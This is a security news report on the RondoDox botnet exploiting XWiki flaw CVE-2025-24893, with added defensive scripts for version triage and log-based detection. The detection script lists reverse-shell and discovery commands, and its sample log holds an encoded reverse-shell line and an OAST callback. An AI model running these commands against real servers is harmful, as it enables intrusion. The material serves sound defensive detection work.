RondoDox is targeting unpatched XWiki servers through a critical RCE flaw to add more devices to its botnet.
The flaw, tracked as CVE-2025-24893, is a code injection issue in XWiki's SolrSearch component that lets an unauthenticated attacker execute arbitrary code by sending a crafted request. Although fixes shipped in February 2025 in versions 15.10.11, 16.4.1, and 16.5.0RC1, many servers remain unpatched.
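A quick way to turn the fixed-version list above into a triage check. This is an added example, not code from VulnCheck or the XWiki project; the three fixed versions come from the text, while the per-branch rule (15.x needs 15.10.11 or later, 16.4.x needs 16.4.1 or later, 16.5 and later need at least 16.5.0RC1, and 16.0 through 16.3 have no fixed release) and the pre-release ordering (milestone before release candidate before final) are assumptions of this example.

```python
"""Decide whether an XWiki version string is on a release fixed for CVE-2025-24893.

Added example, not XWiki's or VulnCheck's code. Fixed versions 15.10.11,
16.4.1 and 16.5.0RC1 are from the report; the branch rule and the
pre-release ordering below are assumptions of this example.
"""
import re
from typing import Dict, Tuple

# Accepts "16.5.0RC1", "16.5.0-rc-1", "15.10.11", "14.10" (patch optional).
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-?(rc|m)-?(\d+))?$", re.IGNORECASE)

# Pre-release rank: milestone < release candidate < final release (assumption).
_RANK = {"M": 0, "RC": 1}
_FINAL = 2


def parse_version(text: str) -> Tuple[int, int, int, int, int]:
    """Turn a version string into a tuple that sorts the way releases were cut."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised XWiki version: {text!r}")
    major, minor, patch, kind, num = m.groups()
    rank = _RANK[kind.upper()] if kind else _FINAL
    return (int(major), int(minor), int(patch or 0), rank, int(num or 0))


def is_patched(version: str) -> bool:
    """True if `version` is at or above the first fixed release on its branch."""
    v = parse_version(version)
    major, minor = v[0], v[1]
    if major < 15:
        return False                                   # older lines never received the fix
    if major == 15:
        return v >= parse_version("15.10.11")
    if major == 16 and minor < 4:
        return False                                   # no fixed release on 16.0-16.3 (assumption)
    if major == 16 and minor == 4:
        return v >= parse_version("16.4.1")
    return v >= parse_version("16.5.0RC1")             # 16.5 and anything newer


def triage(versions) -> Dict[str, str]:
    """Map each reported version to 'patched' or 'VULNERABLE'."""
    return {ver: ("patched" if is_patched(ver) else "VULNERABLE") for ver in versions}


if __name__ == "__main__":
    # Constructed sample of versions as an inventory scan might report them.
    for ver, state in triage(["15.10.10", "15.10.11", "16.3.2", "16.4.0",
                              "16.4.1", "16.5.0RC1", "16.5.0", "17.0.0"]).items():
        print(f"{ver:>10}  {state}")
```

Note that 16.5.0RC1 sorts below the final 16.5.0 but above 16.4.1, which is why the release candidate has to be ordered explicitly rather than compared as a plain string.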
Attack activity surged after the botnet began exploiting the vulnerability on November 3, 2025, according to a recent VulnCheck report. Researchers observed a sharp rise in malicious traffic linked to RondoDox; the attribution rests on the botnet's known User-Agent patterns and payload naming conventions. Payload servers have been observed distributing the malicious scripts used in the expansion campaign.
VulnCheck notes that exploitation attempts come from a diverse set of attackers, ranging from botnets and coin-miners to custom tooling and bespoke scanners.
In addition to automated botnet activity, researchers observed manual probing. Reverse-shell attempts came from several IPs, including an AWS address (18.228.3[.]224) that also sent targeted out-of-band (OAST) probes. Another source, 118.99.141[.]178, likely a compromised consumer device, attempted similar shell commands. Meanwhile, opportunistic scanners are sweeping the internet with tools such as Nuclei, running basic system-discovery commands to confirm successful exploitation.
“Beyond reverse shells, plenty of actors are simply looking for targets, which is why we’ve seen a variety of scanners and probes from attackers. The most interesting one is an out-of-band application security testing (OAST)-based scanner using oast.fun, often associated with Nuclei and similar tools. This sort of traffic usually makes analysts’ eyes glaze over due to the sheer volume of internet-wide probing,” the report explains.
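The signals described above (reverse-shell commands, OAST callbacks to oast.fun, Nuclei-style discovery probes) can be pulled out of ordinary web-server access logs. The script below is an added example, not VulnCheck's detection logic. It assumes combined-format logs, that the vulnerable requests hit XWiki's SolrSearch endpoint under /bin/get/Main/SolrSearch, that the injected content rides in the URL-decoded `text` parameter as wiki macro syntax ({{ ... }}), and that the indicator lists (OAST domains other than oast.fun, shell snippets, scanner User-Agents) are illustrative rather than authoritative. The log lines are constructed; the `{{x}}` payloads are placeholders, not working exploits.

```python
"""Flag CVE-2025-24893 exploitation attempts in XWiki access logs.

Added example, not VulnCheck's or XWiki's code. Assumptions: combined
log format, SolrSearch endpoint path, macro syntax in the `text`
parameter, and the indicator lists (only oast.fun comes from the report).
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Combined format: ip ident user [ts] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

SOLR_PATH = "/bin/get/Main/SolrSearch"                       # assumed endpoint path
OAST_DOMAINS = ("oast.fun", "oast.pro", "oast.live", "oast.site", "interact.sh")  # oast.fun from report, rest assumed
SHELL_HINTS = ("bash -i", "/dev/tcp/", "nc -e", "curl ", "wget ", "uname -a", "whoami", "cat /etc/passwd")
SCANNER_UA = ("nuclei", "python-requests", "go-http-client", "curl/")  # assumed scanner signatures


@dataclass
class Finding:
    ip: str
    user_agent: str
    search_text: str      # URL-decoded `text` parameter
    reasons: List[str]
    severity: str         # "high" if macro syntax is present, else "low"


def classify(line: str) -> Optional[Finding]:
    """Return a Finding for a suspicious SolrSearch request, or None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    parts = urlsplit(m["target"])
    if SOLR_PATH not in parts.path:
        return None                                          # not the vulnerable endpoint
    # parse_qs URL-decodes; join in case the parameter is repeated
    text = " ".join(parse_qs(parts.query).get("text", []))
    lowered = text.lower()
    reasons: List[str] = []
    if "{{" in text and "}}" in text:
        reasons.append("wiki macro syntax in search text")
    for dom in OAST_DOMAINS:
        if dom in lowered:
            reasons.append(f"OAST callback domain {dom}")
            break
    for hint in SHELL_HINTS:
        if hint in lowered:
            reasons.append(f"shell/discovery command '{hint.strip()}'")
            break
    ua = m["ua"].lower()
    for sig in SCANNER_UA:
        if sig in ua:
            reasons.append(f"scanner user-agent ({sig})")
            break
    if not reasons:
        return None
    severity = "high" if "{{" in text else "low"             # UA alone is weak evidence
    return Finding(m["ip"], m["ua"], text, reasons, severity)


def triage(lines) -> Dict[str, List[Finding]]:
    """Group findings by source IP so repeat offenders stand out."""
    by_ip: Dict[str, List[Finding]] = {}
    for line in lines:
        f = classify(line)
        if f:
            by_ip.setdefault(f.ip, []).append(f)
    return by_ip


# Constructed sample log (documentation IPs, placeholder {{x}} macros).
SAMPLE_LOG = [
    '198.51.100.7 - - [04/Nov/2025:10:12:01 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=deployment+guide HTTP/1.1" 200 4123 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/131.0"',
    '203.0.113.9 - - [04/Nov/2025:10:12:44 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Bx%7D%7Dcurl+http://abc123.oast.fun%7B%7B/x%7D%7D HTTP/1.1" 200 512 "-" "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)"',
    '203.0.113.22 - - [04/Nov/2025:10:15:03 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Bx%7D%7Dbash+-i+%3E%26+/dev/tcp/203.0.113.22/4444+0%3E%261%7B%7B/x%7D%7D HTTP/1.1" 200 512 "-" "python-requests/2.32.3"',
    '198.51.100.31 - - [04/Nov/2025:10:16:40 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 8831 "-" "curl/8.5.0"',
]

if __name__ == "__main__":
    for ip, findings in triage(SAMPLE_LOG).items():
        for f in findings:
            print(f"{ip:<14} {f.severity:<5} {'; '.join(f.reasons)}")
```

The first line (a normal search from a browser) and the last (a scanner hitting a page other than SolrSearch) produce no finding; the two placeholder injections are reported with the OAST domain, the shell idiom and the scanner User-Agent each listed as a separate reason. Treat a scanner User-Agent on its own as low confidence, which is why severity is keyed to the macro syntax rather than the UA.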
The US Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-24893 to its Known Exploited Vulnerabilities (KEV) catalog in late October, but researchers said that exploitation was already well underway.
“CVE-2025-24893 is a familiar story: one attacker moves first, and many follow. Within days of the initial exploitation, we saw botnets, miners, and opportunistic scanners all adopting the same vulnerability. Once again, this highlights the gap between exploitation in the wild and visibility at scale. By the time an issue lands in CISA KEV, attackers are already days ahead, and early detection remains the only real advantage defenders have,” the company noted.